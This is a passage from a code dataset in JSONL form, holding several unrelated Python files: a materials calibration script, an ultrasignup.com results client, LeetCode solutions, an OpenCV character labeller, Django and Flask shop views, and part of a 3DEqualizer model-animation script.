Thank you!')\n","sub_path":"RandomizerEDA.py","file_name":"RandomizerEDA.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"80513253","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 23 14:25:50 2014\n\nThis script performs the MKS calibration given the microstructure function \nand the FIP response, both in frequency space.\n\n@author: nhpnp3\n\"\"\"\n\nimport time\nimport numpy as np\nimport functions_ti_alpha_fip_v1 as rr\nfrom functools import partial\n\n\n## el is the # of elements per side of the cube \nel = 21 \n## select which order terms with nearest neighbors you would like to analyze\norder = 1\n## the number of sample microstructures for calibration.\nns = 200\n## specify the number of local states you are using\nH = 15\n## specify the set designation (string format)\nset_id = 'cal'\n## specify the file to write messages to \nwrt_file = 'calib_%s%s_%s.txt' %(ns,set_id,time.strftime(\"%Y-%m-%d_h%Hm%M\")) \n\n\nM = np.load('M_%s%s.npy' %(ns,set_id))\nE11_fft = np.load('E11_fft_%s%s.npy' %(ns,set_id))\n\nstart = time.time()\n\nspecinfc = np.zeros((el**3,H),dtype = 'complex64')\n\n## here we perform the calibration for the scalar FIP\n\nspecinfc[0,:] = rr.calib(0,M,E11_fft,0,H,el,ns)\n[specinfc[1,:],p] = rr.calib(1,M,E11_fft,0,H,el,ns)\n\n## calib_red is simply calib with some default arguments\ncalib_red = partial(rr.calib,M=M,E11_fft=E11_fft,\n p=p,H=H,el=el,ns=ns)\nspecinfc[2:(el**3),:] = np.asarray(map(calib_red,range(2,el**3)))\n \n\nnp.save('specinfc_%s%s' %(ns,set_id),specinfc)\n\nend = time.time()\ntimeE = np.round((end - start),3)\nmsg = 'Calibration: %s seconds' %timeE\nrr.WP(msg,wrt_file)","sub_path":"fip_collab/strain_mks/matthew_200cal_orig/analysis_elastic_strain_step1/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482272427","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\running\\ultrasignup.py\n# Compiled at: 2020-01-13 13:07:07\n# Size of source mod 2**32: 14482 bytes\n\"\"\"\nultrasignup - access methods for ultrasignup.com\n===================================================\n\"\"\"\nimport argparse, os.path, urllib.request, urllib.parse, urllib.error, unicodedata, logging, json\nlogging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s')\nimport httplib2\nfrom loutilities import timeu\nfrom loutilities import csvu\nfrom loutilities import renderrun as render\nfrom running import accessError, parameterError\nULTRASIGNUP_URL = 'http://ultrasignup.com'\nRESULTS_SEARCH = 'service/events.svc/history/{fname}/{lname}'\nHTTPTIMEOUT = 10\nMPERMILE = 1609.344\ntindate = timeu.asctime('%m/%d/%Y %I:%M:%S %p')\ntoutdate = timeu.asctime('%Y-%m-%d')\n\ndef racenameanddist(eventname):\n \"\"\"\n get race name and distance \n \n :param eventname: eventname from untrasignup.com\n :rtype: racename, distmiles, distkm\n \"\"\"\n racetext = eventname.strip()\n fields = racetext.split('-')\n racename = racetext\n distfield = fields[(-1)].strip()\n dist = 0\n startunits = 0\n for digit in distfield:\n if not digit.isdigit():\n break\n dist *= 10\n dist += int(digit)\n startunits += 1\n\n units = distfield[startunits:].strip()\n if distfield == 'Marathon':\n distmiles = 26.21875\n 
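# 26.21875 mi x 1.609344 km/mi is ~42.195 km, the standard marathon distance\n 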
distkm = distmiles * (MPERMILE / 1000)\n else:\n if distfield == '1/2 Marathon':\n distmiles = 13.109375\n distkm = distmiles * (MPERMILE / 1000)\n else:\n if units == 'K':\n distkm = dist\n distmiles = dist * 1000 / MPERMILE\n else:\n if units == 'Miler':\n if dist == 13:\n distmiles = 13.109375\n else:\n if dist == 26:\n distmiles = 26.21875\n else:\n distmiles = dist\n distkm = distmiles * (MPERMILE / 1000)\n else:\n distmiles = None\n distkm = None\n return (\n racename, distmiles, distkm)\n\n\ndef racenameanddur(eventname):\n \"\"\"\n get race name and duration \n \n :param eventname: eventname from untrasignup.com\n :rtype: racename, duration\n \"\"\"\n racetext = eventname.strip()\n fields = racetext.split('-')\n racename = racetext\n durfield = fields[(-1)].strip()\n dur = 0\n startunits = 0\n for digit in durfield:\n if not digit.isdigit():\n break\n dur *= 10\n dur += int(digit)\n startunits += 1\n\n units = durfield[startunits:]\n if units == 'hrs':\n duration = dur\n else:\n duration = None\n return (racename, duration)\n\n\nclass UltraSignupResult:\n __doc__ = '\\n holds result from ultrasignup.com\\n \\n :param ranking: ultra ranking achieved during race\\n :param oaplace: overall place\\n :param genplace: gender place\\n :param age: age on race day\\n :param gender: gender\\n :param racetime: finishing time h:mm:ss\\n :param racedate: date of race yyyy-mm-dd\\n :param raceloc: location of race\\n :param racename: name of race\\n :param distmiles: distance in miles\\n :param distkm: distance in kilometers\\n '\n us_event_attrs = 'runner_rank,place,gender_place,age,time,eventdate,city,state'.split(',')\n attrs = 'ranking,oaplace,genplace,age,racetime,racedate,racecity,racestate,racename,distmiles,distkm,gender'.split(',')\n\n def __init__(self, ranking=None, oaplace=None, genplace=None, age=None, gender=None, racetime=None, racedate=None, raceloc=None, racename=None, distmiles=None, distkm=None):\n self.ranking = ranking\n self.oaplace = oaplace\n self.genplace = genplace\n self.age = age\n self.gender = gender\n self.racetime = racetime\n self.racedate = racedate\n self.raceloc = raceloc\n self.racename = racename\n self.distmiles = distmiles\n self.distkm = distkm\n\n def __repr__(self):\n reprval = '{}('.format(self.__class__)\n for attr in self.attrs:\n reprval += '{}={},'.format(attr, getattr(self, attr))\n\n reprval = reprval[:-1]\n reprval += ')'\n return reprval\n\n def set(self, attrvals):\n \"\"\"\n set attributes based on list of attr,val pairs\n \n :param attrvals: [(attr,val),...]\n \"\"\"\n for attr, inval in attrvals:\n val = csvu.str2num(inval)\n if attr in ('racedate', ):\n val = toutdate.epoch2asc(tindate.asc2epoch(val))\n setattr(self, attr, val)\n\n\nclass UltraSignup:\n __doc__ = '\\n access methods for ultrasignup.com\\n '\n\n def __init__(self, debug=False):\n \"\"\"\n initialize http \n \"\"\"\n self.http = httplib2.Http(timeout=HTTPTIMEOUT)\n self.log = logging.getLogger('running.ultrasignup')\n self.setdebug(debug)\n self.urlcount = 0\n\n def setdebug(self, debugval):\n \"\"\"\n set debugging attribute for this class\n \n :param debugval: set to True to enable debugging\n \"\"\"\n if not debugval:\n level = logging.INFO\n else:\n level = logging.DEBUG\n self.log.setLevel(level)\n\n def geturlcount(self):\n \"\"\"\n each time a url is retrieved, this counter is bumped\n \n :rtype: integer, number of url's retrieved\n \"\"\"\n return self.urlcount\n\n def listresults(self, fname, lname, **filt):\n \"\"\"\n return results which match an athlete's name\n 
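(entries whose status is not 1 are skipped)\n 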
\n :param fname: first name of athlete\n :param lname: last name of athlete\n :param **filt: keyword parameters to filter with\n :rtype: list of ultrasignup Race dicts\n \"\"\"\n races = []\n data = self._get(RESULTS_SEARCH.format(fname=(urllib.parse.quote(fname)),\n lname=(urllib.parse.quote(lname))))\n content = json.loads(data)\n results = []\n for runner in content:\n usresults = runner['Results']\n gender = runner['Gender']\n for usresult in usresults:\n if usresult['status'] != 1:\n pass\n else:\n vals = []\n for a in UltraSignupResult.us_event_attrs:\n vals.append(usresult[a])\n\n result = UltraSignupResult()\n result.set(list(zip(UltraSignupResult.attrs, vals)))\n result.racename, result.distmiles, result.distkm = racenameanddist(usresult['eventname'])\n if result.distmiles == None:\n result.racename, duration = racenameanddur(usresult['eventname'])\n if duration is None:\n pass\n else:\n result.distmiles = result.racetime\n result.distkm = result.distmiles * (MPERMILE / 1000)\n result.racetime = render.rendertime(duration * 60 * 60.0, 0)\n result.gender = gender\n results.append(result)\n\n def _checkfilter(check):\n for key in filt:\n if not hasattr(check, key) or getattr(check, key) != filt[key]:\n return False\n\n return True\n\n results = list(filter(_checkfilter, results))\n return results\n\n def _get(self, method, **params):\n \"\"\"\n get method for ultrasignup access\n \n :param method: ultrasignup method to call\n :param **params: parameters for the method\n \"\"\"\n body = urllib.parse.urlencode(params)\n url = '{}/{}?{}'.format(ULTRASIGNUP_URL, method, body)\n retries = 10\n while retries > 0:\n retries -= 1\n try:\n self.log.debug(url)\n resp, content = self.http.request(url)\n self.urlcount += 1\n break\n except Exception as e:\n if retries == 0:\n self.log.info('{} requests attempted'.format(self.geturlcount()))\n self.log.error('http request failure, retries exceeded: {0}'.format(e))\n raise\n self.log.warning('http request failure: {0}'.format(e))\n\n if resp.status != 200:\n raise accessError('URL response status = {0}'.format(resp.status))\n return content\n\n\ndef main():\n descr = '\\n unit test for ultrasignup.py\\n '\n parser = argparse.ArgumentParser(description=descr, formatter_class=(argparse.RawDescriptionHelpFormatter), version=('{0} {1}'.format('running', version.__version__)))\n args = parser.parse_args()\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/runtilities-2.0.1-py3.6/ultrasignup.cpython-36.py","file_name":"ultrasignup.cpython-36.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"235256761","text":"from utils.BinaryTree import *\n\n\nclass Solution:\n def constructMaximumBinaryTree(self, nums: 'List[int]') -> 'TreeNode':\n return self.constructTree(nums)\n\n def constructTree(self, ls):\n rootIndex = self.findMaxIndex(ls)\n root = TreeNode(ls[rootIndex])\n if rootIndex > 0:\n root.left = self.constructTree(ls[0: rootIndex])\n if rootIndex < len(ls) - 1:\n root.right = self.constructTree(ls[rootIndex + 1:])\n\n return root\n\n def findMaxIndex(self, ls):\n maxx, index = ls[0], 0\n\n for s in range(len(ls)):\n if ls[s] > maxx:\n maxx, index = ls[s], s\n\n return index\n\n\nTree.printTree(Solution().constructMaximumBinaryTree([3, 2, 1, 6, 0, 5]))\n","sub_path":"vol 6/654 Review.py","file_name":"654 
Review.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616717164","text":"import numpy as np\nimport cv2\nimport time\nimport imutils\nimport os\nim2 = cv2.imread('puzzle2Img.png',0)\n#im[im == 255] = 1\n#im[im == 0] = 255\n#im[im == 1] = 0\n#im2 = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\n\n#blur = cv2.GaussianBlur(im,(5,5),0)\n#ret3,im2 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nret,thresh = cv2.threshold(im2,128,255,0)\n#thresh = cv2.adaptiveThreshold(im2,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,11,2)\ncv2.imshow(\"bla\",thresh)\nthresh = cv2.erode(thresh,np.ones((9,9),dtype=np.uint8))\nwat=thresh.copy()\ncv2.imshow(\"thresh\",thresh)\n#print(cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE))\n_,contours, hierarchy = cv2.findContours(wat,cv2.RETR_TREE,cv2.CHAIN_APPROX_TC89_KCOS)\n#contours = []\nim = im2.copy()\nfor i in range(0, len(contours)):\n cnt = contours[i]\n #mask = np.zeros(im2.shape,np.uint8)\n #cv2.drawContours(mask,[cnt],0,255,-1)\n x,y,w,h = cv2.boundingRect(cnt)\n cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n letter=im2[y:y+h,x:x+w]\n letter = cv2.resize(letter,(32,32))\n cv2.imshow('Features', letter)\n cv2.waitKey(50)\n label = input(\"Label: \").strip().upper()\n if(label == 'SKIP'):\n continue\n if not os.path.exists(\"/Users/Toni/PycharmProjects/Trie/characters/\"+str(label)):\n os.mkdir(\"/Users/Toni/PycharmProjects/Trie/characters/\"+str(label))\n cv2.imwrite(\"/Users/Toni/PycharmProjects/Trie/characters/\"+str(label)+\"/\"+str(i)+'.png', letter)\ncv2.destroyAllWindows()","sub_path":"CharacterExtractor.py","file_name":"CharacterExtractor.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"112113881","text":"from django.core.paginator import Paginator\nfrom django.shortcuts import render\nfrom haystack.views import SearchView\n\nfrom django_store import settings\nfrom merchandise.models import MerchandiseType, Merchandise\nfrom shopping_cart.models import Cart\n\n\ndef index(request):\n \"\"\"\n 展示所有商品的首页\n \"\"\"\n type_list = MerchandiseType.objects.all()\n\n # 查询展示各个分类的最新4条,最热4条\n type0_newest = type_list[0].merchandise_set.order_by('-id')[0:4]\n type0_hottest = type_list[0].merchandise_set.order_by('-browse_count')[0:4]\n type1_newest = type_list[1].merchandise_set.order_by('-id')[0:4]\n type1_hottest = type_list[1].merchandise_set.order_by('-browse_count')[0:4]\n type2_newest = type_list[2].merchandise_set.order_by('-id')[0:4]\n type2_hottest = type_list[2].merchandise_set.order_by('-browse_count')[0:4]\n type3_newest = type_list[3].merchandise_set.order_by('-id')[0:4]\n type3_hottest = type_list[3].merchandise_set.order_by('-browse_count')[0:4]\n type4_newest = type_list[4].merchandise_set.order_by('-id')[0:4]\n type4_hottest = type_list[4].merchandise_set.order_by('-browse_count')[0:4]\n type5_newest = type_list[5].merchandise_set.order_by('-id')[0:4]\n type5_hottest = type_list[5].merchandise_set.order_by('-browse_count')[0:4]\n\n # 如果当前用户已经登录���那么查询该用户购物车内的条目数量\n try:\n user_id = request.session['user_id']\n cart_count = Cart.objects.filter(user_id=int(user_id)).count()\n except: # 如果没有登录,那么显示0条购物车条目数\n cart_count = 0\n\n context = {'MEDIA_URL': settings.MEDIA_URL,\n 'title': '首页', 'guest_cart': 1,\n 'cart_count': cart_count,\n 'type0_newest': type0_newest, 'type0_hottest': type0_hottest,\n 'type1_newest': type1_newest, 
'type1_hottest': type1_hottest,\n 'type2_newest': type2_newest, 'type2_hottest': type2_hottest,\n 'type3_newest': type3_newest, 'type3_hottest': type3_hottest,\n 'type4_newest': type4_newest, 'type4_hottest': type4_hottest,\n 'type5_newest': type5_newest, 'type5_hottest': type5_hottest, }\n\n return render(request, 'merchandise/index.html', context)\n\n\ndef list_merchandise_by_type(request, type_id, sorting_criteria, page_num):\n \"\"\"\n 分页展示一个商品分类的所有商品\n \"\"\"\n merchandise_type = MerchandiseType.objects.get(pk=int(type_id))\n\n # 查询该分类下的两个最新商品\n news = merchandise_type.merchandise_set.order_by('-id')[0:2]\n\n if int(sorting_criteria) == 1:\n merchandise_list = Merchandise.objects.filter(\n type_id=int(type_id)).order_by('-id') # 按照id逆序\n elif int(sorting_criteria) == 2:\n merchandise_list = Merchandise.objects.filter(\n type_id=int(type_id)).order_by('-price') # 按照价格逆序\n elif int(sorting_criteria) == 3:\n merchandise_list = Merchandise.objects.filter(\n type_id=int(type_id)).order_by('-browse_count') # 按照浏览量逆序\n else:\n raise Exception('当前传入排序参数有误')\n\n paginator = Paginator(merchandise_list, 10) # 创建分页对象\n page = paginator.page(int(page_num)) # 返回指定页码的一页信息\n\n # 如果当前用户已经登录,那么查询该用户购物车内的条目数量\n try:\n user_id = request.session['user_id']\n cart_count = Cart.objects.filter(user_id=int(user_id)).count()\n except: # 如果没有登录,那么显示0条购物车条目数\n cart_count = 0\n\n context = {'MEDIA_URL': settings.MEDIA_URL,\n 'title': merchandise_type, 'guest_cart': 1,\n 'cart_count': cart_count,\n 'page': page, 'paginator': paginator,\n 'merchandise_type': merchandise_type,\n 'sorting_criteria': sorting_criteria, 'news': news, }\n\n return render(request, 'merchandise/list.html', context)\n\n\ndef detail(request, merchandise_id):\n \"\"\"\n 商品详情页\n \"\"\"\n merchandise = Merchandise.objects.get(pk=merchandise_id)\n merchandise.browse_count += 1 # 当点击进商品详情页的时候就把浏览数加一\n merchandise.save()\n\n # 查询该商品的分类下的两个最新商品,在商品详情页的左下角显示\n newest_recommend = merchandise.type.merchandise_set.order_by('-id')[0:2]\n\n context = {'MEDIA_URL': settings.MEDIA_URL,\n 'title': merchandise.name,\n 'guest_cart': 1,\n 'merchandise': merchandise,\n 'newest_recommend': newest_recommend,\n 'merchandise_id': merchandise_id}\n # 构造响应对象\n response = render(request, 'merchandise/detail.html', context)\n\n # 记录最近浏览的商品,在用户中心展示\n cached_merchandise_id_str = request.COOKIES.get('merchandise_id_str', '')\n cached_merchandise_id = str(merchandise_id)\n if cached_merchandise_id_str != '':\n # 拆分为列表\n cached_merchandise_id_list = cached_merchandise_id_str.split(',')\n if cached_merchandise_id_list.count(cached_merchandise_id) >= 1:\n # 如果商品已经被记录,那么删除已经在缓存队列中的这个商品\n cached_merchandise_id_list.remove(cached_merchandise_id)\n # 在点击商品详情页时,将这个商品加入缓存队列队首\n cached_merchandise_id_list.insert(0, cached_merchandise_id)\n if len(cached_merchandise_id_list) >= 6:\n # 如果最近浏览队列超过6个,那么删除队列队尾\n cached_merchandise_id_list.pop()\n # 拼接为字符串,因为cookie无法存储对象,只能存储字符串\n cached_merchandise_id_str = ','.join(cached_merchandise_id_list)\n else:\n # 如果没有浏览记录,则直接将这个商品添加到缓存队列\n cached_merchandise_id_str = cached_merchandise_id\n\n # 将最近浏览缓存队列存入cookie\n response.set_cookie('merchandise_id_str', cached_merchandise_id_str)\n\n return response\n\n\ndef _cart_count(request):\n \"\"\"\n 查询购物车条目数量\n \"\"\"\n if 'user_id' in request.session:\n return Cart.objects.filter(\n user_id=request.session.get('user_id')).count()\n else:\n return 0\n\n\nclass MerchandiseSearchView(SearchView):\n \"\"\"\n 自定义haystack搜索视图\n \"\"\"\n\n def extra_context(self):\n context = super().extra_context() # 
call the parent class's extra_context() to get the base context\n\n        context['title'] = '搜索'\n        context['MEDIA_URL'] = settings.MEDIA_URL\n        context['guest_cart'] = 1\n        context['cart_count'] = _cart_count(self.request)\n\n        return context\n","sub_path":"merchandise/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"283465946","text":"class Solution:\n    def merge(self, nums1, m, nums2, n):\n        \"\"\"\n        :type nums1: List[int]\n        :type m: int\n        :type nums2: List[int]\n        :type n: int\n        :rtype: void Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        start_1 = m - 1\n        start_2 = n - 1\n        insert_point = m + n - 1 \n        while start_1 >= 0 and start_2 >= 0:\n            if nums1[start_1] >= nums2[start_2]:\n                nums1[insert_point] = nums1[start_1] \n                start_1 -= 1\n            else:\n                nums1[insert_point] = nums2[start_2]\n                start_2 -= 1\n            insert_point -= 1\n\n        if start_1 >= 0:\n            while start_1 >= 0:\n                nums1[insert_point] = nums1[start_1] \n                start_1 -= 1\n                insert_point -= 1\n\n        if start_2 >= 0:\n            while start_2 >= 0:\n                nums1[insert_point] = nums2[start_2]\n                start_2 -= 1\n                insert_point -= 1","sub_path":"0-100/88_merge_sorted_array.py","file_name":"88_merge_sorted_array.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"149466737","text":"from decimal import Decimal\n\nfrom flask import request, jsonify, Blueprint\nfrom my_app import app, db\nfrom my_app.catalog.models import Product\n\nfrom my_app import redis\n\ncatalog = Blueprint('catalog', __name__)\n\n\n@catalog.route('/')\n@catalog.route('/home')\ndef home():\n    return \"Welcome to the Catalog Home.\"\n\n\n@catalog.route('/product/<key>')\ndef product(key):\n    product = Product.objects.get_or_404(key=key)\n    product_key = 'product-%s' % product.id\n    redis.set(product_key, product.name)\n    redis.expire(product_key, 600)\n    return 'Product - %s, $%s' % (product.name, product.price)\n\n\n@catalog.route('/products')\ndef products():\n    products = Product.objects.all()\n    res = {}\n    for product in products:\n        res[product.key] = {\n            'name': product.name,\n            'price': str(product.price)\n        }\n    return jsonify(res)\n\n\n@catalog.route('/product-create', methods=['POST', ])\ndef create_product():\n    name = request.form.get('name')\n    key = request.form.get('key')\n    price = request.form.get('price')\n    product = Product(\n        name=name,\n        key=key,\n        price=Decimal(price)\n    )\n    product.save()\n    return 'Product created.'\n\n\n@catalog.route('/recent-products')\ndef recent_products():\n    keys_alive = redis.keys('product-*')\n    products = [redis.get(k) for k in keys_alive]\n    return jsonify({'products': products})\n\n\n\n\n\n\n\n\n\n\n","sub_path":"my_app/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18855050","text":"# 3DE4.script.name: 3DModel Animation Curve Editor...\r\n# 3DE4.script.version: v1.0b3\r\n# 3DE4.script.gui: Lineup Controls::Edit\r\n# 3DE4.script.gui: Orientation Controls::Edit\r\n# 3DE4.script.gui.button: Lineup Controls::3DModel Anim, align-bottom-left, 80,20\r\n# 3DE4.script.gui.button: Orientation Controls::3DModel Anim, align-bottom-left, 70,20\r\n# 3DE4.script.comment:\tThis script allows user to animate 3DModels inside of 3DE.\r\n# 3DE4.script.gui.config_menus: true\r\n# Patcha Saheb(patchasaheb@gmail.com)\r\n# 10 Oct 2017.\r\n\r\nfrom vl_sdv import*\r\nimport 
math\r\n\r\ntde4.clearConsole()\r\npg = tde4.getCurrentPGroup()\r\npg_type = tde4.getPGroupType(pg)\r\ncam = tde4.getCurrentCamera()\r\nframe = tde4.getCurrentFrame(cam)\r\nframes = tde4.getCameraNoFrames(cam)\r\nframe_offset = tde4.getCameraFrameOffset(cam)\r\nmlist = tde4.get3DModelList(pg,1)\r\nwindow_title = \"Patcha 3DModel Animation Curve Editor v1.0b3\"\r\n\r\ndef Realtime_Update(req):\r\n\tpg = tde4.getCurrentPGroup()\r\n\tcam = tde4.getCurrentCamera()\r\n\tframe = tde4.getCurrentFrame(cam)\r\n\tmlist = tde4.get3DModelList(pg,0)\r\n\r\n\t#cursor update...\r\n\tframe = tde4.getCurrentFrame(tde4.getCurrentCamera())\r\n\ttde4.setCurveAreaWidgetCursorPosition(anim_req,\"curves_area\",frame,1)\r\n\r\n\tif tde4.getWidgetValue(anim_req,\"live_update_toggle\") == 1:\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor model in mlist:\r\n\t\t\tm_name = tde4.get3DModelName(pg,model)\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tif m_name == label:\r\n\t\t\t\t\t#position curves live update to viewport...\r\n\t\t\t\t\tpos_x_curve_y = tde4.evaluateCurve(pos_x_curves_list[item],frame)\t\r\n\t\t\t\t\tpos_y_curve_y = tde4.evaluateCurve(pos_y_curves_list[item],frame)\t\r\n\t\t\t\t\tpos_z_curve_y = tde4.evaluateCurve(pos_z_curves_list[item],frame)\r\n\t\t\t\t\ttde4.set3DModelPosition3D(pg,model,[pos_x_curve_y,pos_y_curve_y,pos_z_curve_y])\r\n\r\n\t\t\t\t\t#rotation and scale curves live update to viewport...\r\n\t\t\t\t\trot_x_curve_y = tde4.evaluateCurve(rot_x_curves_list[item],frame) * math.pi /180.0\t\r\n\t\t\t\t\trot_y_curve_y = tde4.evaluateCurve(rot_y_curves_list[item],frame) * math.pi /180.0\t\r\n\t\t\t\t\trot_z_curve_y = tde4.evaluateCurve(rot_z_curves_list[item],frame) * math.pi /180.0\r\n\t\t\t\t\trot_Matrix = mat3d(rot3d(rot_x_curve_y,rot_y_curve_y,rot_z_curve_y,VL_APPLY_ZXY))\r\n\t\t\t\t\tm = mat3d(tde4.get3DModelRotationScale3D(pg,model))\r\n\t\t\t\t\tuniform_scale_curve_y = tde4.evaluateCurve(scale_curves_list[item],frame)\r\n\t\t\t\t\tscale_Matrix = mat3d(uniform_scale_curve_y,0.0,0.0,0.0,uniform_scale_curve_y,0.0,0.0,0.0,uniform_scale_curve_y)\r\n\t\t\t\t\tf = rot_Matrix * scale_Matrix\t\t\t\t\t\r\n\t\t\t\t\ttde4.set3DModelRotationScale3D(pg,model,f.list())\r\n\r\n\t\t\t\t\t#visibility live update to viewport...\r\n\t\t\t\t\tvisibility_curve_y = tde4.evaluateCurve(visibility_curves_list[item],frame)\r\n\t\t\t\t\tif visibility_curve_y == 0:\r\n\t\t\t\t\t\ttde4.set3DModelVisibleFlag(pg,model,0)\r\n\t\t\t\t\tif visibility_curve_y == 1:\r\n\t\t\t\t\t\ttde4.set3DModelVisibleFlag(pg,model,1)\r\n\r\n\t\t\t\t\t#alpha live update to viewport...\r\n\t\t\t\t\talpha_curve_y = tde4.evaluateCurve(alpha_curves_list[item],frame)\r\n\t\t\t\t\tm_color = tde4.get3DModelColor(pg,model)\r\n\t\t\t\t\ttde4.set3DModelColor(pg,model,m_color[0],m_color[1],m_color[2],alpha_curve_y)\r\n\t\t\t\t\ttde4.updateGUI(1)\r\n\t\t\t\t\t\r\n\r\ndef Create_Keys(pg,cam,mlist,frame):\r\n\tpg = tde4.getCurrentPGroup()\r\n\tcam = tde4.getCurrentCamera()\r\n\tframe = tde4.getCurrentFrame(cam)\r\n\tframes = tde4.getCameraNoFrames(tde4.getCurrentCamera())\r\n\tmlist = tde4.get3DModelList(pg,0)\r\n\r\n\t#make sure only one item must be selected...\r\n\tcount = 0\r\n\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\tfor item in range(0,no_of_items):\r\n\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\tif sel_flag == 1:\r\n\t\t\tcount = count + 
1\r\n\r\n\t#create keys...\t\t\r\n\tif count == 1:\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tbreak\r\n\t\tfor model in mlist:\r\n\t\t\tm_name = tde4.get3DModelName(pg,model)\r\n\t\t\tif m_name == label:\r\n\t\t\t\tbreak\r\n\r\n\t\t#create position curves keys...\r\n\t\tpos3d = vec3d(tde4.get3DModelPosition3D(pg,model,cam,frame))\r\n\t\tkey = tde4.createCurveKey(pos_x_curves_list[item],[frame,float(pos3d[0])])\r\n\t\ttde4.setCurveKeyFixedXFlag(pos_x_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(pos_x_curves_list[item],key,\"LINEAR\")\r\n\t\tpos3d = vec3d(tde4.get3DModelPosition3D(pg,model,cam,frame))\r\n\t\tkey = tde4.createCurveKey(pos_y_curves_list[item],[frame,float(pos3d[1])])\r\n\t\ttde4.setCurveKeyFixedXFlag(pos_y_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(pos_y_curves_list[item],key,\"LINEAR\")\r\n\t\tpos3d = vec3d(tde4.get3DModelPosition3D(pg,model,cam,frame))\r\n\t\tkey = tde4.createCurveKey(pos_z_curves_list[item],[frame,float(pos3d[2])])\r\n\t\ttde4.setCurveKeyFixedXFlag(pos_z_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(pos_z_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create rotation curves keys...\r\n\t\tr3d = mat3d(tde4.get3DModelRotationScale3D(pg,model))\r\n\t\ts0 = vec3d(r3d[0][0],r3d[1][0],r3d[2][0]).norm2()\r\n\t\ts1 = vec3d(r3d[0][1],r3d[1][1],r3d[2][1]).norm2()\r\n\t\ts2 = vec3d(r3d[0][2],r3d[1][2],r3d[2][2]).norm2()\r\n\t\tm_rot = r3d * mat3d(1.0/s0,0.0,0.0,0.0,1.0/s1,0.0,0.0,0.0,1.0/s2)\r\n\t\tphi_x,phi_y,phi_z = rot3d(m_rot).angles(VL_APPLY_ZXY)\r\n\t\tphi_x = phi_x * 180.0 / math.pi\r\n\t\tphi_y = phi_y * 180.0 / math.pi\r\n\t\tphi_z = phi_z * 180.0 / math.pi\r\n\t\tkey = tde4.createCurveKey(rot_x_curves_list[item],[frame,float(phi_x)])\r\n\t\ttde4.setCurveKeyFixedXFlag(rot_x_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(rot_x_curves_list[item],key,\"LINEAR\")\r\n\t\tkey = tde4.createCurveKey(rot_y_curves_list[item],[frame,float(phi_y)])\r\n\t\ttde4.setCurveKeyFixedXFlag(rot_y_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(rot_y_curves_list[item],key,\"LINEAR\")\r\n\t\tkey = tde4.createCurveKey(rot_z_curves_list[item],[frame,float(phi_z)])\r\n\t\ttde4.setCurveKeyFixedXFlag(rot_z_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(rot_z_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create scale curves keys..\r\n\t\tkey = tde4.createCurveKey(scale_curves_list[item],[frame,float(s0)])\r\n\t\ttde4.setCurveKeyFixedXFlag(scale_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(scale_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create visibility curves keys...\r\n\t\tvis_status = tde4.get3DModelVisibleFlag(pg,model)\r\n\t\tkey = tde4.createCurveKey(visibility_curves_list[item],[frame,int(vis_status)])\r\n\t\ttde4.setCurveKeyFixedXFlag(visibility_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(visibility_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create alpha curves keys...\r\n\t\talpha_v = tde4.get3DModelColor(pg,model)\r\n\t\tkey = 